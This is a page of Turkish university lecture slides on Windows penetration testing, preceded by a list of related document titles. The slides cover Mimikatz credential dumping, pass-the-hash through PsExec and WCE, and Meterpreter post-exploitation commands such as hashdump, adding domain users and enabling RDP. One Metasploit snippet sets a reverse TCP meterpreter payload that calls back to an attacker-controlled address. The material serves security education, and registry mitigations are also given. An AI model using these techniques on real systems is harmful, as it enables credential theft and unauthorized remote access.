Windows Hacking - II

Benzer belgeler
05 - Veritabanı Sızma Testleri

Veritabanı Sızma Testleri Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı

HAZIRLAYAN BEDRİ SERTKAYA Sistem Uzmanı CEH EĞİTMENİ

Armitage Nedir? Kullanım Öncesi

Exploitation Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı

MICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI

Anti-Virüs Atlatma 3. Kurulum

Uzaktan Kurulum Kılavuzu

BioAffix Ones Technology nin tescilli markasıdır.

ADIM ADIM METASPLOIT METERPRETER SHELL DAVRANIŞ ANALİZİ

08224 Sunucu İşletim Sistemleri

Sistem Programlama. (*)Dersimizin amaçları Kullanılan programlama dili: C. Giriş/Cıkış( I/O) Sürücülerinin programlaması

04 - Veritabanı Sızma Testleri - 1

Metasploit Framework ile Güvenlik Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci at gamasec.net

Ağ Bağlantılarında Windows Kullanan Müşteriler için

Sunucu İşletim Sistemini Ayarlamak ve Yönetmek

EKLER EK 12UY0106-5/A4-1:

FortiGate (Terminal Server) Terminal Sunucu Üzerinden Gelen Kullanıcılar

Bilgi ve İletişim Teknolojileri (JFM 102) Ders 7. LINUX OS (Sistem Yapısı) BİLGİ & İLETİŞİM TEKNOLOJİLERİ. LINUX Yapısı

Bilgisayarım My Computer

Yerel Ağlarda Port 139 ve Saldırı Yöntemi

ProFTPD FTP Sunucusu. Devrim GÜNDÜZ. TR.NET Sistem Destek Uzmanı.

Sunucu İşletim Sistemini Ayarlamak ve Yönetmek. Elbistan Meslek Yüksek Okulu Bahar Yarıyılı

KULLANICI KILAVUZU: UEA FİX KULLANICILARININ SSLVPN ERİŞİMİ İMKB İÇİNDEKİLER

Turquaz Windows kurulum dökümanı. ftp://ftp.mirror.ac.uk/sites/ftp.postgresql.org/binary/v7.3.1/windows/pgsql731wina1.exe

Module 2 Managing User And Computer accounts

Bilgisayarım My Computer. Elbistan Meslek Yüksek Okulu Bahar Yarıyılı

EFe Event Management System

Bilgi Güvenliği Denetim Sürecinde Özgür Yazılımlar. Fatih Özavcı Bilgi Güvenliği Danışmanı

1 WINDOWS SERVER 2012 GENEL BAKIŞ 1 Giriş 1 Bu Kitapta 5 Çıkış Hikâyesi 6 Sürümler 7

Uzak Masaüstü Lisans Server ı Aktive Etme

Güvenliğin Görüntülenmesi, Verilerin Analizi ve Atakların Eş Zamanlı Olarak Durdurulması. Akademik Bilişim Şubat 2006

Anti-Virüs Atlatma 1. Resimden anlaşıldığı üzere 56 anti-virüs yazılımından 36 tanesi zararlı yazılım olduğunu doğrulamıştır.

Hızlı Başlangıç Kılavuzu

Metasploit Framework ile Güvenlik Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı

Module 5 Implementing Printing ( Printer Uygulamaları )

Kurumsal Güvenlik ve Web Filtreleme

1. Yazdırma Bileşenleri

TL-WPS510U PRINT SERVER KURULUM DÖKÜMANI

Yedek Almak ve Yedekten Geri Dönmek

Aktif Dizin Logon/Logoff Script Ayarları Versiyon

Kurumsal Güvenlik ve Web Filtreleme

Linux Temelli Zararlı Yazılımların Bulaşma Teknikleri, Engellenmesi ve Temizlenmesi

Vitel. Manage Engine. Opmanager Yönetici Özeti

Kets DocPlace LOGO Entegrasyonu

Kurum Personeli için Kablosuz İnternet Erişimi (Wi-Fi) Kullanım Kılavuzu

"SQL Server Management Studio" yazılımını yüklemek için alttaki resmi sitesinden 180 günlük deneme sürümünü indirebilirsiniz.

Trickbot Zararlı Yazılımı İnceleme Raporu

Sızma Testlerinde İleri Düzey Teknikler. Ozan UÇAR

Scream! e gelen veri akışlarından bazılarını diğer bir kurum yada bilgisayarla paylaşmak için kullanılabilir.

SAMURAİ FRAMEWORK İLE HACKİNG-1 (FOOTPRINTING)

Yazıcı camından veya otomatik belge besleyicisinden (ADF) taramaları başlatabilirsiniz. Posta kutusunda saklanan tarama dosyalarına erişebilirsiniz.

UserLock bir servis olarak çalışıyor ve son kullanıcının çalışmasını engellenmeden otomatik olarak yüklenen aracı programlar (agent) kullanıyor.

AKINSOFT. Eofis NetworkAdmin. AKINSOFT EOfis NetworkAdmin Kurulumu Bilgi Notu. Doküman Versiyon : Tarih : Copyright 2008 AKINSOFT

LOGO TIGER WINGS KURULUMU VE AYARLARI

BioAffix Ones Technology nin tescilli markasıdır.

Windows Đşletim Sistemleri AD Etki Alanı Grupları Đncelenmesi ve Güvenlik Ayarları

Nmap Sonuçlarının Yorumlanması

Temel Bilgi Teknlolojileri 1. Ders notları 5. Öğr.Gör. Hüseyin Bilal MACİT 2017

Windows Grup İlkesi Düzenleyici

Sızma Testlerinde İleri Düzey Teknikler. Ozan UÇAR

BioAffix Ones Technology nin tescilli markasıdır.

Kets DocPlace Bilgi Bankası. 1. İstemcilerde sunucuya ulaşılamadı şeklinde bağlantı hatası alınıyor... 2

Module 3 Managing Group ( Group Yönetimi )

Windows Hacking - I. BGM Sızma Testleri ve Güvenlik Denetlemeleri-II. Yüksek Lisans Programı. Dr. Ferhat Özgür Çatak

ORTA DOĞU TEKNİK ÜNİVERSİTESİ BİLGİ İŞLEM DAİRE BAŞKANLIĞI. Güvenlik ve Virüsler. ODTÜ BİDB İbrahim Çalışır, Ozan Tuğluk, Cengiz Acartürk

MUDDYWATER / PROXYRAT SİSTEM SIKILAŞTIRMA ÖNERİLERİ

Ağ Bağlantısı Hızlı Kurulum Kılavuzu

08224 Sunucu İşletim Sistemleri

Module 9 Managing The User Environment By Using Group Policy ( Group Policy Kullanıcı Yönetimi )

SAB 103 TEMEL BİLGİSAYAR KULLANIMI


SÜRE BAŞLAMA TARİHİ : 19/12/2018 BİTİŞ TARİHİ : 20/02/2019 KURS SÜRESİ : 144 Saat KURS NO :

Ağ Sızma Testleri ve 2. Katman Saldırıları Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı

Coslat Monitor (Raporcu)

Web Uygulama Güvenliği Kontrol Listesi 2010

Bir 802.1x Kimlik Kanıtlama Uygulaması: EDUROAM

Sistem Yöneticiliği Seti

ÖĞRENCİ LABORATUARLARI İÇİN OPTİMUM ÇÖZÜMLER

Windows Server 2008R2 de Lisans Server ın Aktive Edilmesi

Linux altında komut satırında...

FortiGate Active Directory Uygulaması. v4.00-build /08

Oluşturmak istediğimiz OU ye bir isim veriyoruz. Name kısmına ISTANBUL yazıyoruz,

Anti-Virüs Atlatma 2. Kurulum

Öğrenciler için Kablosuz İnternet Erişimi (Wi-Fi) Kullanım Kılavuzu

Servisler Olaylar İşlemler Services Events - Processes

Bağlantı Kılavuzu. Yazıcıyı yerel olarak yükleme (Windows) Yerel yazdırma nedir? Yazıcıyı Yazılım ve Belgeler CD'sini kullanarak kurma

ÖNDER BİLGİSAYAR KURSU. Sistem ve Ağ Uzmanlığı Eğitimi İçeriği

Windows Server 2012 Active Directory Kurulumu

LOGO DESTEK DOKÜMANI

BitTorrent İstemci Kullanımı

Bilgisayar İşletim Sistemleri BLG 312

İşletim Sistemi Nedir?

HUAWEI Cihazlara Erişim Yöntemleri

SAMBA Linux Dosya Sunucusu

Bilgi ve Olay Yönetim Sistemi

İstemci Yönetimi ve Genel Yazdırma Çözümleri

Bilgisayar Kurulum Kullanıcı Kılavuzu

Exploit Geliştirme Altyapıları. Fatih Özavcı Bilgi Güvenliği Danışmanı

Transkript:

BGM 554 - Sızma Testleri ve Güvenlik Denetlemeleri-II Bilgi Güvenliği Mühendisliği Yüksek Lisans Programı Dr. Ferhat Özgür Çatak ozgur.catak@tubitak.gov.tr İstanbul Şehir Üniversitesi 2016/2017 - Bahar

İçindekiler 1 Keşif (Devam) Mimikatz Demo smb enumshares 2 Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları 3 Post Modülleri

Mimikatz Demo smb enumshares İçindekiler 1 Keşif (Devam) Mimikatz Demo smb enumshares 2 Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları 3 Post Modülleri

Mimikatz Demo smb enumshares Mimikatz Demo I Mimikatz Windows işletim sisteminde oturum açıldığında kullanıcı ad/parola memory de saklanır. Bir bilgisayara active directory hesabı kullanılarak oturum açıldığında parola yine memory üzerinde olacaktır. Bu zafiyet kullanılarak LSA prosesi exploit edilir. Mimikatz aracı kullanılarak LSASS (Local Security Authority Process) prosesi dump edilerek oluşturulan dosyayı açılabilmektedir.

Mimikatz Demo smb enumshares Mimikatz Demo II

Mimikatz Demo smb enumshares Mimikatz Demo III

Mimikatz Demo smb enumshares Mimikatz Demo IV

Mimikatz Demo smb enumshares Mimikatz Demo V

Mimikatz Demo smb enumshares Mimikatz Demo VI Mimikatz Genellikle bir betik kullanılarak bu süreci otomatize edebilmektedirler. Procdump 1 ftp veya benzeri bir yöntemle dosyanın dışarı aktarılması ve erişim sağlama yöntemi Mimikatz 2 sadece oturum açmış kullanıcıları değil aynı zamanda daha önce oturum açmış kullanıcılara ait bilgilerede erişebilmektedir. Mimikatz terminal sunucu üzerinde çalıştırılması durumunda sunucuyu kullanmış bütün kullanıcılar hakkında bilgi edinilebilir. 1 https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx 2 https://github.com/gentilkiwi/mimikatz/releases

Mimikatz Demo smb enumshares smb enumshares I Administrative Shares Sistem yöneticilerinin bir ağa bağlı sistemdeki her disk birimine uzaktan erişmesine olanak tanıyan Windows NT işletim sistemi ailesi tarafından oluşturulan gizli ağ paylaşımlarıdır. Disk volumes: Sistemdeki her disk birimi, administrative share olarak paylaştırılır. C, D ve E birimlerinin bulunduğu bir sistem, C$, D$ veya E$ adlı üç paylaşıma sahiptir. OS folder: Windows un yüklü olduğu klasör admin$ Fax cache: Fakslanan sayfaların ve kapak sayfalarının önbelleğe alındığı klasör, fax$ IPC shares: inter-process communication ipc$ Printers folder: Yüklü yazıcıları temsil eden nesneyi içeren sanal klasör, print$

Mimikatz Demo smb enumshares smb enumshares II

Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları İçindekiler 1 Keşif (Devam) Mimikatz Demo smb enumshares 2 Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları 3 Post Modülleri

Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları I Keşif aşamasında ve iç ağ testleri sırasında elde edilen bilgiler doğrultusunda sistemlere erişim sağlanması Kullanılan yöntemler Sistemlerde bulunan zafiyetler Yerel yönetici hesapları Pass the hash(psexec vb.) Kaba kuvvet saldırıları İç ağ testlerinde elde edilen kullanıcı bilgileri içeren dosyalar

Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları Pass the Hash Pass the Hash Güçlü bir parola politikası olduğu durumlarda NTLM şifre özetlerinin kırılması uzun süreler alabilmektedir. Bu durumlara karşı özellikle Windows sistemlerde şifre özetleri kullanılarak sistemlere erişim sağlanabilmektedir. Pass the Hash yöntemi Windows sistemlerde dosya, yazıcı paylaşımları gibi bilgisayar kaynaklarının paylaşılmasını sağlayan Server Message Block (SMB) protokolünü kullanır. Pass the Hash yönteminin çalışması için hedef bilgisayarda yönetimsel paylaşımların ya da yönetici hakkıyla açılmış başka paylaşımların bulunması gerekmektedir. Pass the Hash yöntemini kullanarak hedef bilgisayarlara erişim sağlayan araçlardan birisi PsExec tir.

PsExec - Metasploit I Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları PsExec - Metasploit Metasploit PsExec aracının hedef bilgisayar üzerinde oturum açabilmesi için gerekli bilgiler şunlardır: Hedef bilgisayara ait IP adresi Kullanıcı adı Parola özeti Yönetimsel paylaşım Hedef bilgisayar üzerinde Pass the Hash yöntemini engellemek için herhangi bir güvenlik politikası uygulanmamışsa, yukarıdaki bilgiler doğrultusunda yüksek seviyeli haklarla açılan bir meterpreter oturumu elde edilibilir. PsExec aracının oturum açabilmesi için araca verilen kullanıcının hedef bilgisayar üzerinde yönetimsel paylaşımlar üzerinde hak sahibi olması gerekmektedir.

PsExec - Metasploit II Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları Parametreler RHOST: Hedef bilgisayara ait IP bilgisi RPORT: Hedef bilgisayar üzerinde SMB protokolünün çalıştığı port SHARE: Hedef bilgisayarda kullanılacak yönetimsel paylaşım SMBDomain: Hedef bilgisayar üzerinde yetkili olan kullanıcı hesabının üye olduğu etki alanı (Workgroup Etki alanı) SMBUser: Hedef bilgisayar üzerinde yetkili olan kullanıcı SMBPass: Hedef bilgisayar üzerinde yetkili olan kullanıcıya ait parola ya da şifre özeti set payload windows/meterpreter/reverse tcp set LHOST 192.168.4.33 set LPORT 443

PsExec - Metasploit III Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları

PsExec - Metasploit IV Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları

PsExec - Metasploit V Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları

Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları Sysinternals PsExec I Sysinternals PsExec Sysinternals PsExec 3 aracının hedef bilgisayar üzerinde oturum açabilmesi için gerekli bilgiler şunlardır: Hedef bilgisayara ait IP adresi Kullanıcı adı Parola Yönetimsel paylaşım

Sysinternals PsExec II Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları 3 https://technet.microsoft.com/tr-tr/sysinternals/bb897553.aspx

Sysinternals PsExec + Wce I Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları PsExec + Wce Wce 4 Şifre özetinin kullanılarak PsExec in çalıştırılması Hedef bilgisayara ait kullanıcı adı ve şifre özeti bilgisi hedef bilgisayarın IP adresi ile birlikte PsExec aracının çalıştırılacağı bilgisayarın belleğine yüklenmektedir. PsExec aracına herhangi bir kullanıcı bilgisi ve şifre özeti bilgisi verilmeden hedef bilgisayar üzerinde komut satırı erişimi elde edilir.

Sysinternals PsExec + Wce II Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları 4 http://www.ampliasecurity.com/research/windows-credentials-editor/

PsExec Sınırlandırmaları I Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları Yönetimsel paylaşımların kapalı olması AutoShareWks => 0 HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\ Services \LanmanServer\Parameters\AutoShareWks AutoShareServer => 0 HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\ Services\LanmanServer\Parameters\AutoShareServer

İçindekiler Post Modülleri 1 Keşif (Devam) Mimikatz Demo smb enumshares 2 Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları 3 Post Modülleri

I Post Modülleri Sistemlere sızıldıktan sonra gerçekleştirilen işlemler üzerinde yapılan işlemler Parola özetleri elde etme Parola özetlerini kırma Etki alanına yetkili kullanıcı ekleme Bellekten parola alma Envanter, bağlantı bilgisi vb. bilgiler içeren dosyaları arama Sunucu yedekleri tespit etme

II Post Modülleri Post-exploitation sonrası elde edilen bilgiler Kullanıcı adı ve parola bilgileri Şifre özetleri Etki alanında yetkili kullanıcı Sistemler hakkında detaylı bilgi Sunucu yedekleri Etki alanı kullanıcıları ve şifre özetleri Veritabanı bağlantı bilgileri

I Post Modülleri

II Post Modülleri Stdapi, Priv ve Core meterpreter oturumu açıldığında otomatik olarak yüklenmektedir. Yüklü olmayan eklentileri kullanabilmek için load eklenti adı çalıştırılmalıdır.

Post Modülleri Core Komutları Background: Aktif olan meterpreter oturumunu arka plana alarak, metasploit ekranına dönülmesini sağlar. Session i komutu ile tekrar ilgili meterpreter oturumuna geri dönülür. Migrate: Farklı bir kullanıcının çalıştırdığı sürecin elde edilmesini ve o kullanıcının haklarının kullanılmasını sağlar. Şu an çalışan sürecin hakkından daha yüksek haklı bir sürece geçiş yapılamaz. Exit: Aktif olan meterpreter oturumunu sonlandırır. Run: oturumu üzerinde post modüller ya da script çalıştırmak için kullanılır.

I Post Modülleri oturumunda en çok kullanılan komutların bulunduğu eklentidir. Üç alt başlığa sahiptir: Dosya sistemi Sistem Kullanıcı arayüzü.

II Post Modülleri 1. File System Komutları cd/lcd: Dosya sistemleri üzerinde dolaşma için kullanılır. l (local) harfi işlemin metasploit aracının kurulu olduğu bilgisayardaki dosya sisteminde gerçekleştiğini belirtir. upload/download: Hedef bilgisayara dosya yükleme ve hedef bilgisayardan dosya indirmek için kullanılır.

III Post Modülleri 2. System Komutları getpid/getuid: oturumunun hangi kullanıcı ile açıldığını gösterir. shell: Hedef bilgisayar üzerinde komut satırı erişimi sağlar. sysinfo: Hedef bilgisayar hakkında bilgi verir. ps: Hedef bilgisayarda çalışan süreçleri ve süreçlerle ilgili bilgileri gösterir. kill: Hedef bilgisayar üzerinde çalışan süreçleri öldürmek için kullanılır. reg: Hedef bilgisayardaki kayıt defterini yönetmek için kullanılır.

Post Modülleri IV 3. User Interface idletime: Hedef bilgisayarda oturum açmış kullanıcının işlem yapmadığı süreyi belirtir.

I Post Modülleri Priv: hedef bilgisayar üzerinde hak yükseltmek Incognito: etki alanında hak yükseltmek ve yönetici olmak Priv komutları Getsystem: SYSTEM haklarını elde etmek için kullanılır. Bilgisayardaki bazı güvenlik maddelerine bağlı olarak bazen çalışmayabilmektedir. Hashdump: Hedef bilgisayarda bulunan yerel kullanıcı şifre özetlerini elde eder. Çalışmayabilir. Alternatif olarak hashdump post modülü kullanılabilir.

II Post Modülleri Incognito komutları Add user: Hedef bilgisayara ya da etki alanına kullanıcı ekler. Add group user: Hedef bilgisayardaki ya da etki alanındaki gruplara kullanıcı ekler.

III Post Modülleri

Post Modülleri I Mimikatz Mimikatz: Windows sistemlerde bellekte saklanan parolaları elde etmek için kullanılmaktadır.

II Post Modülleri

Post Modülleri I Post Modülleri Post Post modüller: bilgi toplamak ve çeşitli işlemler gerçekleştirmektedir

Post Modülleri II Post Modülleri enum termserv Post Modulü

Post Modülleri III Post Modülleri

Post Modülleri IV Post Modülleri hashdump Post Modulü

Post Modülleri V Post Modülleri enable rdp Post Modulü Bilgisayara uzak masaüstü oturumu açılmasına izin veren değeri değiştirir (fdenytsconnections 1 => Uzak masaüstü oturumuna izin verme). Uzak masaüstü servisinin başlatma durumu Devre Dışı (Disabled) ise, Otomatik (Automatic) olarak değiştirir.

Post Modülleri VI Post Modülleri Uzak masaüstü servisini başlatır. Güvenlik duvarında uzak masaüstü servisinin kullandığı portu açar (Gerekli olduğu durumlarda).

komutu I Post Modülleri Gölge Kopyalardan Şifre Özeti Alma Dosyaların eski versiyonlarına geri dönüş yapabilmeyi sağlayan Windows işletim sisteminin bir özelliği 5 Current volume shadow copy backups All installed shadow copy writers and providers.

komutu II Post Modülleri 5 https://technet.microsoft.com/en-us/library/cc754968(v=ws.11).aspx

2024 © DocPlayer.biz.tr Gizlilik Politikası | Hizmet koşulları | Geri bildirim